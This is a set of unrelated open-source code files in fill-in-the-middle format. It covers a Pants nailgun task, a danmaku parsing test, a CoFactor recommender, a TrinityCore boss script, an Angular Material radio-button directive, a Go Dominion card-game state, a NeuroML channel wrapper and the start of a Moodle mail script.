<|file_name|>nailgun_task.py<|end_file_name|><|fim▁begin|># coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import os from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin from pants.base.exceptions import TaskError from pants.java import util from pants.java.executor import SubprocessExecutor from pants.java.jar.jar_dependency import JarDependency from pants.java.nailgun_executor import NailgunExecutor, NailgunProcessGroup from pants.pantsd.subsystem.subprocess import Subprocess from pants.task.task import Task, TaskBase class NailgunTaskBase(JvmToolTaskMixin, TaskBase): ID_PREFIX = 'ng' @classmethod def register_options(cls, register): super(NailgunTaskBase, cls).register_options(register) register('--use-nailgun', type=bool, default=True, help='Use nailgun to make repeated invocations of this task quicker.') register('--nailgun-timeout-seconds', advanced=True, default=10, type=float, help='Timeout (secs) for nailgun startup.') register('--nailgun-connect-attempts', advanced=True, default=5, type=int, help='Max attempts for nailgun connects.') cls.register_jvm_tool(register, 'nailgun-server', classpath=[ JarDependency(org='com.martiansoftware', name='nailgun-server',<|fim▁hole|> @classmethod def subsystem_dependencies(cls): return super(NailgunTaskBase, cls).subsystem_dependencies() + (Subprocess.Factory,) def __init__(self, *args, **kwargs): """ :API: public """ super(NailgunTaskBase, self).__init__(*args, **kwargs) id_tuple = (self.ID_PREFIX, self.__class__.__name__) self._identity = '_'.join(id_tuple) self._executor_workdir = os.path.join(self.context.options.for_global_scope().pants_workdir, *id_tuple) def create_java_executor(self): """Create java executor that uses this task's ng daemon, if allowed. Call only in execute() or later. TODO: Enforce this. """ if self.get_options().use_nailgun: classpath = os.pathsep.join(self.tool_classpath('nailgun-server')) return NailgunExecutor(self._identity, self._executor_workdir, classpath, self.dist, connect_timeout=self.get_options().nailgun_timeout_seconds, connect_attempts=self.get_options().nailgun_connect_attempts) else: return SubprocessExecutor(self.dist) def runjava(self, classpath, main, jvm_options=None, args=None, workunit_name=None, workunit_labels=None, workunit_log_config=None): """Runs the java main using the given classpath and args. If --no-use-nailgun is specified then the java main is run in a freshly spawned subprocess, otherwise a persistent nailgun server dedicated to this Task subclass is used to speed up amortized run times. :API: public """ executor = self.create_java_executor() # Creating synthetic jar to work around system arg length limit is not necessary # when `NailgunExecutor` is used because args are passed through socket, therefore turning off # creating synthetic jar if nailgun is used. create_synthetic_jar = not self.get_options().use_nailgun try: return util.execute_java(classpath=classpath, main=main, jvm_options=jvm_options, args=args, executor=executor, workunit_factory=self.context.new_workunit, workunit_name=workunit_name, workunit_labels=workunit_labels, workunit_log_config=workunit_log_config, create_synthetic_jar=create_synthetic_jar, synthetic_jar_dir=self._executor_workdir) except executor.Error as e: raise TaskError(e) # TODO(John Sirois): This just prevents ripple - maybe inline class NailgunTask(NailgunTaskBase, Task): """ :API: public """ pass class NailgunKillall(Task): """Kill running nailgun servers.""" @classmethod def register_options(cls, register): super(NailgunKillall, cls).register_options(register) register('--everywhere', type=bool, help='Kill all nailguns servers launched by pants for all workspaces on the system.') def execute(self): NailgunProcessGroup().killall(everywhere=self.get_options().everywhere)<|fim▁end|>
rev='0.9.1'), ])
<|file_name|>test_danmaku_process.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from unittest import TestCase from nose.tools import eq_ from mock import Mock from datetime import datetime from tests.constants import STRING, NUMBER, DATE from tests.asserters import eq_obj from danmaku.cores.danmaku_process import generate_danmaku from danmaku.cores.danmaku_process import process_recieve_data from danmaku.models import DANMU_MSG, SEND_GIFT, WELCOME, SEND_TOP from danmaku.models.danmaku import DanmakuModel from danmaku.configs.personal_settings import TIME_FORMAT from danmaku.helpers import convert_hexascii_to_int def test_generate_danmaku(): msg = { u'info': [ [ 0, 1, 25, 16777215, 1441727762, 1585812335, 0, u'c8de2b91', 0], u'xxxxx', [ NUMBER, u'xxxx', 0, u'0'] ], u'cmd': u'DANMU_MSG', u'roomid': NUMBER } danmaku_type = DANMU_MSG publisher = msg['info'][2][1].encode('utf-8') content = msg['info'][1].encode('utf-8') is_vip = msg['info'][2][2] == 1 is_admin = int(msg['info'][2][3].encode('utf-8')) == 1 expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': NUMBER, u'cmd': u'SEND_GIFT', u'data': { u'top_list': [ {u'uname': u'xxx', u'coin': NUMBER, u'uid': NUMBER}, ], u'uid': NUMBER, u'timestamp': 1441727778, u'price': NUMBER, u'giftId': 1, u'uname': u'xxxxx', u'num': NUMBER, u'rcost': NUMBER, u'super': 0, u'action': u'\u5582\u98df', u'giftName': u'\u8fa3\u6761' } } danmaku_type = SEND_GIFT publisher = msg['data']['uname'].encode('utf-8') content = ''.join( [str(msg['data']['num']), ' X ', msg['data']['giftName'].encode('utf-8'), ' 目前共花销:', str(msg['data']['rcost'])]) is_vip = False is_admin = False expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': NUMBER, u'cmd': u'WELCOME', u'data': { u'uname': u'xxxxxr', u'isadmin': 0, u'uid': NUMBER } } danmaku_type = WELCOME publisher = msg['data']['uname'].encode('utf-8') is_vip = True content = None is_admin = msg['data']['isadmin'] == 1 expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': u'11111', u'cmd': u'SEND_TOP', u'data': { u'top_list': [ {u'uname': u'xxxx', u'coin': NUMBER, u'uid': NUMBER}, ]<|fim▁hole|> } } danmaku_type = SEND_TOP tops = msg["data"]['top_list'] contents = ["{}: {} {}".format(top['uid'], top['uname'], top['coin']) for top in tops] content = '\n'.join(contents) publisher = "排行榜" is_vip = False is_admin = False expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) def test_process_recieve_data(): # I have no idea to tests it. mock_fun = Mock(process_recieve_data) mock_fun.return_value = True eq_(mock_fun(), True)<|fim▁end|>
<|file_name|>CoFactor.py<|end_file_name|><|fim▁begin|>from base.iterativeRecommender import IterativeRecommender import numpy as np from util import config from collections import defaultdict from math import log,exp from scipy.sparse import * from scipy import * class CoFactor(IterativeRecommender): def __init__(self, conf, trainingSet=None, testSet=None, fold='[1]'): super(CoFactor, self).__init__(conf, trainingSet, testSet, fold) def readConfiguration(self): super(CoFactor, self).readConfiguration() extraSettings = config.OptionConf(self.config['CoFactor']) self.negCount = int(extraSettings['-k']) #the number of negative samples if self.negCount < 1: self.negCount = 1 self.regR = float(extraSettings['-gamma']) self.filter = int(extraSettings['-filter']) def printAlgorConfig(self): super(CoFactor, self).printAlgorConfig() print('Specified Arguments of', self.config['model.name'] + ':') print('k: %d' % self.negCount) print('regR: %.5f' %self.regR) print('filter: %d' %self.filter) print('=' * 80) def initModel(self): super(CoFactor, self).initModel() #constructing SPPMI matrix self.SPPMI = defaultdict(dict) print('Constructing SPPMI matrix...') #for larger data set has many items, the process will be time consuming occurrence = defaultdict(dict) i=0 for item1 in self.data.item: i += 1 if i % 100 == 0: print(str(i) + '/' + str(self.num_items)) uList1, rList1 = self.data.itemRated(item1) if len(uList1) < self.filter: continue for item2 in self.data.item: if item1 == item2: continue if item2 not in occurrence[item1]: uList2, rList2 = self.data.itemRated(item2) if len(uList2) < self.filter: continue count = len(set(uList1).intersection(set(uList2))) if count > self.filter: occurrence[item1][item2] = count occurrence[item2][item1] = count maxVal = 0 frequency = {} for item1 in occurrence: frequency[item1] = sum(occurrence[item1].values()) * 1.0 D = sum(frequency.values()) * 1.0 # maxx = -1 for item1 in occurrence: for item2 in occurrence[item1]: try: val = max([log(occurrence[item1][item2] * D / (frequency[item1] * frequency[item2])) - log( self.negCount), 0]) except ValueError: print(self.SPPMI[item1][item2]) print(self.SPPMI[item1][item2] * D / (frequency[item1] * frequency[item2])) if val > 0: if maxVal < val: maxVal = val self.SPPMI[item1][item2] = val self.SPPMI[item2][item1] = self.SPPMI[item1][item2] #normalize for item1 in self.SPPMI: for item2 in self.SPPMI[item1]: self.SPPMI[item1][item2] = self.SPPMI[item1][item2]/maxVal def buildModel(self): self.X=self.P*10 #Theta self.Y=self.Q*10 #Beta self.w = np.random.rand(self.num_items) / 10 # bias value of item self.c = np.random.rand(self.num_items) / 10 # bias value of context self.G = np.random.rand(self.num_items, self.emb_size) / 10 # context embedding print('training...') epoch = 0 while epoch < self.maxEpoch: self.loss = 0 YtY = self.Y.T.dot(self.Y) for user in self.data.user: # C_u = np.ones(self.data.getSize(self.recType)) H = np.ones(self.num_items) val, pos = [],[] P_u = np.zeros(self.num_items) uid = self.data.user[user] for item in self.data.trainSet_u[user]: iid = self.data.item[item] r_ui = float(self.data.trainSet_u[user][item]) pos.append(iid) val.append(10 * r_ui) H[iid] += 10 * r_ui P_u[iid] = 1 error = (P_u[iid] - self.X[uid].dot(self.Y[iid])) self.loss += pow(error, 2) # sparse matrix C_u = coo_matrix((val, (pos, pos)), shape=(self.num_items, self.num_items)) A = (YtY + np.dot(self.Y.T, C_u.dot(self.Y)) + self.regU * np.eye(self.emb_size)) self.X[uid] = np.dot(np.linalg.inv(A), (self.Y.T * H).dot(P_u)) XtX = self.X.T.dot(self.X) for item in self.data.item: P_i = np.zeros(self.num_users) iid = self.data.item[item] H = np.ones(self.num_users) val,pos = [],[] for user in self.data.trainSet_i[item]: uid = self.data.user[user] r_ui = float(self.data.trainSet_i[item][user]) pos.append(uid) val.append(10 * r_ui) H[uid] += 10 * r_ui P_i[uid] = 1 matrix_g1 = np.zeros((self.emb_size, self.emb_size)) matrix_g2 = np.zeros((self.emb_size, self.emb_size)) vector_m1 = np.zeros(self.emb_size) vector_m2 = np.zeros(self.emb_size) update_w = 0 update_c = 0 if len(self.SPPMI[item])>0: for context in self.SPPMI[item]: cid = self.data.item[context] gamma = self.G[cid] beta = self.Y[cid] matrix_g1 += gamma.reshape(self.emb_size, 1).dot(gamma.reshape(1, self.emb_size)) vector_m1 += (self.SPPMI[item][context]-self.w[iid]- self.c[cid])*gamma matrix_g2 += beta.reshape(self.emb_size, 1).dot(beta.reshape(1, self.emb_size)) vector_m2 += (self.SPPMI[item][context] - self.w[cid] - self.c[iid]) * beta update_w += self.SPPMI[item][context]-self.Y[iid].dot(gamma)-self.c[cid] update_c += self.SPPMI[item][context]-beta.dot(self.G[iid])-self.w[cid] C_i = coo_matrix((val, (pos, pos)), shape=(self.num_users, self.num_users)) A = (XtX + np.dot(self.X.T, C_i.dot(self.X)) + self.regU * np.eye(self.emb_size) + matrix_g1) self.Y[iid] = np.dot(np.linalg.inv(A), (self.X.T * H).dot(P_i)+vector_m1) if len(self.SPPMI[item]) > 0: self.G[iid] = np.dot(np.linalg.inv(matrix_g2 + self.regR * np.eye(self.emb_size)), vector_m2) self.w[iid] = update_w/len(self.SPPMI[item]) self.c[iid] = update_c/len(self.SPPMI[item]) epoch += 1 print('epoch:', epoch, 'loss:', self.loss) def predictForRanking(self,u): 'invoked to rank all the items for the user' if self.data.containsUser(u): u = self.data.getUserId(u) return self.Y.dot(self.X[u]) else:<|fim▁hole|><|fim▁end|>
return [self.data.globalMean] * self.num_items
<|file_name|>boss_jandice_barov.cpp<|end_file_name|><|fim▁begin|>/* * This file is part of the TrinityCore Project. See AUTHORS file for Copyright information * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along * with this program. If not, see <http://www.gnu.org/licenses/>. */ #include "ScriptMgr.h" #include "scholomance.h" #include "ScriptedCreature.h" enum Spells { SPELL_CURSE_OF_BLOOD = 24673, SPELL_ILLUSION = 17773, SPELL_DROP_JOURNAL = 26096 }; enum Events { EVENT_CURSE_OF_BLOOD = 1, EVENT_ILLUSION, EVENT_CLEAVE, EVENT_SET_VISIBILITY }; class boss_jandice_barov : public CreatureScript { public: boss_jandice_barov() : CreatureScript("boss_jandice_barov") { } struct boss_jandicebarovAI : public ScriptedAI { boss_jandicebarovAI(Creature* creature) : ScriptedAI(creature), Summons(me) { } void Reset() override { events.Reset(); Summons.DespawnAll(); } void JustSummoned(Creature* summoned) override { // Illusions should attack a random target. if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0)) summoned->AI()->AttackStart(target); summoned->ApplySpellImmune(0, IMMUNITY_DAMAGE, SPELL_SCHOOL_MASK_MAGIC, true); // Not sure if this is correct. Summons.Summon(summoned); } void JustEngagedWith(Unit* /*who*/) override {<|fim▁hole|> void JustDied(Unit* /*killer*/) override { Summons.DespawnAll(); DoCastSelf(SPELL_DROP_JOURNAL, true); } void UpdateAI(uint32 diff) override { if (!UpdateVictim()) return; events.Update(diff); if (me->HasUnitState(UNIT_STATE_CASTING)) return; while (uint32 eventId = events.ExecuteEvent()) { switch (eventId) { case EVENT_CURSE_OF_BLOOD: DoCastVictim(SPELL_CURSE_OF_BLOOD); events.ScheduleEvent(EVENT_CURSE_OF_BLOOD, 30s); break; case EVENT_ILLUSION: DoCast(SPELL_ILLUSION); me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE); me->SetDisplayId(11686); // Invisible Model ModifyThreatByPercent(me->GetVictim(), -99); events.ScheduleEvent(EVENT_SET_VISIBILITY, 3s); events.ScheduleEvent(EVENT_ILLUSION, 25s); break; case EVENT_SET_VISIBILITY: me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE); me->SetDisplayId(11073); //Jandice Model break; default: break; } if (me->HasUnitState(UNIT_STATE_CASTING)) return; } DoMeleeAttackIfReady(); } private: EventMap events; SummonList Summons; }; CreatureAI* GetAI(Creature* creature) const override { return GetScholomanceAI<boss_jandicebarovAI>(creature); } }; void AddSC_boss_jandicebarov() { new boss_jandice_barov(); }<|fim▁end|>
events.ScheduleEvent(EVENT_CURSE_OF_BLOOD, 15s); events.ScheduleEvent(EVENT_ILLUSION, 30s); }
<|file_name|>radioButton.js<|end_file_name|><|fim▁begin|>/*! * Angular Material Design * https://github.com/angular/material * @license MIT * v0.10.1-rc2-master-7bbfd1f */ goog.provide('ng.material.components.radioButton'); goog.require('ng.material.core'); /** * @ngdoc module * @name material.components.radioButton * @description radioButton module! */ angular.module('material.components.radioButton', [ 'material.core' ]) .directive('mdRadioGroup', mdRadioGroupDirective) .directive('mdRadioButton', mdRadioButtonDirective); /** * @ngdoc directive * @module material.components.radioButton * @name mdRadioGroup * * @restrict E * * @description * The `<md-radio-group>` directive identifies a grouping * container for the 1..n grouped radio buttons; specified using nested * `<md-radio-button>` tags. * * As per the [material design spec](http://www.google.com/design/spec/style/color.html#color-ui-color-application) * the radio button is in the accent color by default. The primary color palette may be used with * the `md-primary` class. * * Note: `<md-radio-group>` and `<md-radio-button>` handle tabindex differently * than the native `<input type='radio'>` controls. Whereas the native controls * force the user to tab through all the radio buttons, `<md-radio-group>` * is focusable, and by default the `<md-radio-button>`s are not. * * @param {string} ng-model Assignable angular expression to data-bind to. * @param {boolean=} md-no-ink Use of attribute indicates flag to disable ink ripple effects. * * @usage * <hljs lang="html"> * <md-radio-group ng-model="selected"> * * <md-radio-button * ng-repeat="d in colorOptions" * ng-value="d.value" aria-label="{{ d.label }}"> * * {{ d.label }} * * </md-radio-button> * * </md-radio-group> * </hljs> * */ function mdRadioGroupDirective($mdUtil, $mdConstant, $mdTheming, $timeout) { RadioGroupController.prototype = createRadioGroupControllerProto(); return { restrict: 'E', controller: ['$element', RadioGroupController], require: ['mdRadioGroup', '?ngModel'], link: { pre: linkRadioGroup } }; function linkRadioGroup(scope, element, attr, ctrls) { $mdTheming(element); var rgCtrl = ctrls[0]; var ngModelCtrl = ctrls[1] || $mdUtil.fakeNgModel(); function setFocus() { if (!element.hasClass('md-focused')) { element.addClass('md-focused'); } } function keydownListener(ev) { var keyCode = ev.which || ev.keyCode; switch(keyCode) { case $mdConstant.KEY_CODE.LEFT_ARROW: case $mdConstant.KEY_CODE.UP_ARROW: ev.preventDefault(); rgCtrl.selectPrevious(); setFocus(); break; case $mdConstant.KEY_CODE.RIGHT_ARROW: case $mdConstant.KEY_CODE.DOWN_ARROW: ev.preventDefault(); rgCtrl.selectNext(); setFocus(); break; case $mdConstant.KEY_CODE.ENTER: var form = angular.element($mdUtil.getClosest(element[0], 'form')); if (form.length > 0) { form.triggerHandler('submit'); } break;<|fim▁hole|> rgCtrl.init(ngModelCtrl); scope.mouseActive = false; element.attr({ 'role': 'radiogroup', 'tabIndex': element.attr('tabindex') || '0' }) .on('keydown', keydownListener) .on('mousedown', function(event) { scope.mouseActive = true; $timeout(function() { scope.mouseActive = false; }, 100); }) .on('focus', function() { if(scope.mouseActive === false) { rgCtrl.$element.addClass('md-focused'); } }) .on('blur', function() { rgCtrl.$element.removeClass('md-focused'); }); } function RadioGroupController($element) { this._radioButtonRenderFns = []; this.$element = $element; } function createRadioGroupControllerProto() { return { init: function(ngModelCtrl) { this._ngModelCtrl = ngModelCtrl; this._ngModelCtrl.$render = angular.bind(this, this.render); }, add: function(rbRender) { this._radioButtonRenderFns.push(rbRender); }, remove: function(rbRender) { var index = this._radioButtonRenderFns.indexOf(rbRender); if (index !== -1) { this._radioButtonRenderFns.splice(index, 1); } }, render: function() { this._radioButtonRenderFns.forEach(function(rbRender) { rbRender(); }); }, setViewValue: function(value, eventType) { this._ngModelCtrl.$setViewValue(value, eventType); // update the other radio buttons as well this.render(); }, getViewValue: function() { return this._ngModelCtrl.$viewValue; }, selectNext: function() { return changeSelectedButton(this.$element, 1); }, selectPrevious: function() { return changeSelectedButton(this.$element, -1); }, setActiveDescendant: function (radioId) { this.$element.attr('aria-activedescendant', radioId); } }; } /** * Change the radio group's selected button by a given increment. * If no button is selected, select the first button. */ function changeSelectedButton(parent, increment) { // Coerce all child radio buttons into an array, then wrap then in an iterator var buttons = $mdUtil.iterator(parent[0].querySelectorAll('md-radio-button'), true); if (buttons.count()) { var validate = function (button) { // If disabled, then NOT valid return !angular.element(button).attr("disabled"); }; var selected = parent[0].querySelector('md-radio-button.md-checked'); var target = buttons[increment < 0 ? 'previous' : 'next'](selected, validate) || buttons.first(); // Activate radioButton's click listener (triggerHandler won't create a real click event) angular.element(target).triggerHandler('click'); } } } mdRadioGroupDirective.$inject = ["$mdUtil", "$mdConstant", "$mdTheming", "$timeout"]; /** * @ngdoc directive * @module material.components.radioButton * @name mdRadioButton * * @restrict E * * @description * The `<md-radio-button>`directive is the child directive required to be used within `<md-radio-group>` elements. * * While similar to the `<input type="radio" ng-model="" value="">` directive, * the `<md-radio-button>` directive provides ink effects, ARIA support, and * supports use within named radio groups. * * @param {string} ngModel Assignable angular expression to data-bind to. * @param {string=} ngChange Angular expression to be executed when input changes due to user * interaction with the input element. * @param {string} ngValue Angular expression which sets the value to which the expression should * be set when selected.* * @param {string} value The value to which the expression should be set when selected. * @param {string=} name Property name of the form under which the control is published. * @param {string=} aria-label Adds label to radio button for accessibility. * Defaults to radio button's text. If no text content is available, a warning will be logged. * * @usage * <hljs lang="html"> * * <md-radio-button value="1" aria-label="Label 1"> * Label 1 * </md-radio-button> * * <md-radio-button ng-model="color" ng-value="specialValue" aria-label="Green"> * Green * </md-radio-button> * * </hljs> * */ function mdRadioButtonDirective($mdAria, $mdUtil, $mdTheming) { var CHECKED_CSS = 'md-checked'; return { restrict: 'E', require: '^mdRadioGroup', transclude: true, template: '<div class="md-container" md-ink-ripple md-ink-ripple-checkbox>' + '<div class="md-off"></div>' + '<div class="md-on"></div>' + '</div>' + '<div ng-transclude class="md-label"></div>', link: link }; function link(scope, element, attr, rgCtrl) { var lastChecked; $mdTheming(element); configureAria(element, scope); rgCtrl.add(render); attr.$observe('value', render); element .on('click', listener) .on('$destroy', function() { rgCtrl.remove(render); }); function listener(ev) { if (element[0].hasAttribute('disabled')) return; scope.$apply(function() { rgCtrl.setViewValue(attr.value, ev && ev.type); }); } function render() { var checked = (rgCtrl.getViewValue() == attr.value); if (checked === lastChecked) { return; } lastChecked = checked; element.attr('aria-checked', checked); if (checked) { element.addClass(CHECKED_CSS); rgCtrl.setActiveDescendant(element.attr('id')); } else { element.removeClass(CHECKED_CSS); } } /** * Inject ARIA-specific attributes appropriate for each radio button */ function configureAria( element, scope ){ scope.ariaId = buildAriaID(); element.attr({ 'id' : scope.ariaId, 'role' : 'radio', 'aria-checked' : 'false' }); $mdAria.expectWithText(element, 'aria-label'); /** * Build a unique ID for each radio button that will be used with aria-activedescendant. * Preserve existing ID if already specified. * @returns {*|string} */ function buildAriaID() { return attr.id || ( 'radio' + "_" + $mdUtil.nextUid() ); } } } } mdRadioButtonDirective.$inject = ["$mdAria", "$mdUtil", "$mdTheming"]; ng.material.components.radioButton = angular.module("material.components.radioButton");<|fim▁end|>
} }
<|file_name|>state.go<|end_file_name|><|fim▁begin|>package main import ( "fmt" "sort" "strings" ) type State struct {<|fim▁hole|> Picks []string victory int numProv int } func (s *State) NewCopy() State { ds := State{} ds.hand = make([]string, len(s.hand)) ds.discard = make([]string, len(s.discard)) ds.deck = make([]string, len(s.deck)) ds.Picks = make([]string, len(s.Picks)) copy(ds.hand, s.hand) copy(ds.discard, s.discard) copy(ds.deck, s.deck) copy(ds.Picks, s.Picks) ds.victory = -1 ds.numProv = -1 return ds } func (s *State) PickState() string { return strings.Join(s.Picks, " ") } func (s *State) Print() { var c []string c = append(c, "HAND") c = append(c, s.hand...) c = append(c, "DISCARD") c = append(c, s.discard...) c = append(c, "DECK") c = append(c, s.deck...) c = append(c, "PICKS") c = append(c, s.Picks...) fmt.Println(strings.Join(c, " ")) fmt.Printf("Victory points: %d\n", s.TotalVictory()) } func (s *State) StringHand() string { return strings.Join(s.hand, ",") } func (s *State) Init() { for i := 0; i < 3; i++ { s.deck = append(s.deck, "estate") } for i := 0; i < 7; i++ { s.deck = append(s.deck, "copper") } shuffle(s.deck) if s.TotalCards() != 10 { panic("Invalid initialization of state") } s.victory = -1 s.numProv = -1 } func (s *State) drawCards(num int) []string { numcards := len(s.deck) + len(s.discard) if len(s.deck) < num { s.discard = append(s.discard, s.deck...) s.deck = s.deck[:0] shuffle(s.discard) s.deck = make([]string, len(s.discard)) copy(s.deck, s.discard) // s.deck = s.discard s.discard = s.discard[:0] if len(s.discard) != 0 { panic("Coders fault") } } if len(s.deck) < num { // Chapel strategy can trash a lot of cards. num = len(s.deck) } cards := make([]string, num) copy(cards, s.deck[0:num]) s.deck = s.deck[num:] if len(s.deck)+len(s.discard) != numcards-num { panic("Coders fault again") } return cards } func (s *State) DrawHand() { if len(s.hand) != 0 { panic("Already have hand") // fmt.Println("Already have hand") return } cards := s.drawCards(5) s.hand = make([]string, len(cards)) copy(s.hand, cards) } func (s *State) AddToHand(num int) { cards := s.drawCards(num) s.hand = append(s.hand, cards...) } func (s *State) CardInHand(name string) bool { for _, card := range s.hand { if card == name { return true } } return false } func (s *State) CopyHand() []string { cp := make([]string, len(s.hand)) copy(cp, s.hand) return cp } func (s *State) TrashFromHand(indices []int) string { var trashed []string for _, idx := range indices { if idx >= len(s.hand) { panic("Invalid index") } trashed = append(trashed, s.hand[idx]) s.hand[idx] = "" } var newh []string for _, card := range s.hand { if card != "" { newh = append(newh, card) } } s.hand = newh sort.Sort(sort.StringSlice(trashed)) return strings.Join(trashed, ",") } func (s *State) TrashUselessCards() { var newh []string for _, card := range s.hand { if card == "copper" || card == "estate" { continue } newh = append(newh, card) } s.hand = newh } func (s *State) AddCardAndDiscardHand(c string) { s.victory = -1 s.numProv = -1 s.discard = append(s.discard, c) s.Picks = append(s.Picks, c) s.Discard() } func (s *State) Discard() { s.discard = append(s.discard, s.hand...) s.hand = s.hand[:0] if len(s.hand) != 0 { panic("Hand should be zero.") } } func (s *State) Value() int { total := 0 for _, card := range s.hand { total += GetValue(card) } return total } func (s *State) TotalVictory() int { if s.victory != -1 { return s.victory } total := 0 for _, card := range s.discard { total += GetVictory(card) } for _, card := range s.deck { total += GetVictory(card) } for _, card := range s.hand { total += GetVictory(card) } s.victory = total return total } func (s *State) NumProvinces() int { if s.numProv != -1 { return s.numProv } s.numProv = s.TotalCardsByName("province") return s.numProv } func (s *State) TotalCards() int { total := 0 total += len(s.discard) total += len(s.hand) total += len(s.deck) return total } func (s *State) TotalCardsByName(name string) int { total := 0 for _, card := range s.discard { if card == name { total += 1 } } for _, card := range s.deck { if card == name { total += 1 } } for _, card := range s.hand { if card == name { total += 1 } } return total }<|fim▁end|>
hand []string discard []string deck []string
<|file_name|>neuroml_via_neurounits_neuron.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Copyright (c) 2012 Michael Hull. # All rights reserved. #<|fim▁hole|># # - Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # - Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------- from morphforge.simulation.neuron.core.neuronsimulationenvironment import NEURONEnvironment from morphforgecontrib.simulation.channels.neuroml_via_neurounits.neuroml_via_neurounits_core import NeuroML_Via_NeuroUnits_Channel from neurounits.importers.neuroml import ChannelMLReader from morphforgecontrib.simulation.channels.neurounits.neuro_units_bridge import Neuron_NeuroUnitEqnsetMechanism class NeuroML_Via_NeuroUnits_ChannelNEURON(Neuron_NeuroUnitEqnsetMechanism, NeuroML_Via_NeuroUnits_Channel): def __init__(self, xml_filename, chlname=None,**kwargs): (eqnset, chlinfo, default_params) = ChannelMLReader.BuildEqnset(xml_filename) default_params = dict([(k, v.as_quantities_quantity()) for (k, v) in default_params.iteritems()]) super(NeuroML_Via_NeuroUnits_ChannelNEURON,self).__init__(eqnset=eqnset, default_parameters=default_params, recordables_map=None, recordables_data=None, xml_filename=xml_filename, chlname=chlname, **kwargs) NEURONEnvironment.channels.register_plugin(NeuroML_Via_NeuroUnits_Channel, NeuroML_Via_NeuroUnits_ChannelNEURON)<|fim▁end|>
# Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met:
<|file_name|>mail.js<|end_file_name|><|fim▁begin|>YUI(M.yui.loader, {lang: M.local_mail_lang}).use('io-base', 'node', 'json-parse', 'panel', 'datatable-base', 'dd-plugin', 'moodle-form-dateselector', 'datatype-date', 'calendar-base', function(Y) { var mail_message_view = false; var mail_checkbox_labels_default = {}; var mail_view_type = ''; var mail_edit_label_panel; var mail_new_label_panel; var mail_undo_function = ''; var mail_undo_ids = ''; var mail_search_selected = ''; var mail_searchfrom_selected = ''; var mail_searchto_selected = ''; var mail_unread_selected = false; var mail_attach_selected = false; var mail_date_selected = ''; var mail_doing_search = false; var mail_after_message_search = false; var mail_before_message_search = false; var mail_perpageid = 0; var init = function(){ mail_view_type = Y.one('input[name="type"]').get('value'); if (Y.one('input[name="m"]')) { mail_message_view = true; Y.one('.mail_checkbox_all').remove(); } mail_enable_all_buttons(mail_message_view); if (!mail_message_view) { mail_select_none(); } if (mail_view_type == 'trash') { mail_remove_action('.mail_menu_action_markasstarred'); mail_remove_action('.mail_menu_action_markasunstarred'); } mail_update_menu_actions(); mail_create_edit_label_panel(); mail_create_new_label_panel(); mail_define_label_handlers(); }; var mail_define_label_handlers = function () { if (Y.one('#local_mail_form_new_label')) { //Click on new label color div Y.one('#local_mail_form_new_label').delegate('click', function(e) { e.stopPropagation(); mail_label_set_selected(this, 'new'); }, '.mail_label_color'); } if (Y.one('#local_mail_form_edit_label')) { //Click on edit label color div Y.one('#local_mail_form_edit_label').delegate('click', function(e) { e.stopPropagation(); mail_label_set_selected(this, 'edit'); }, '.mail_label_color'); } }; var mail_create_edit_label_panel = function () { var title = M.util.get_string('editlabel', 'local_mail'); var obj = (Y.one('.mail_list')?Y.one('.mail_list'):Y.one('.mail_view')); var position = obj.getXY(); var width = 400; 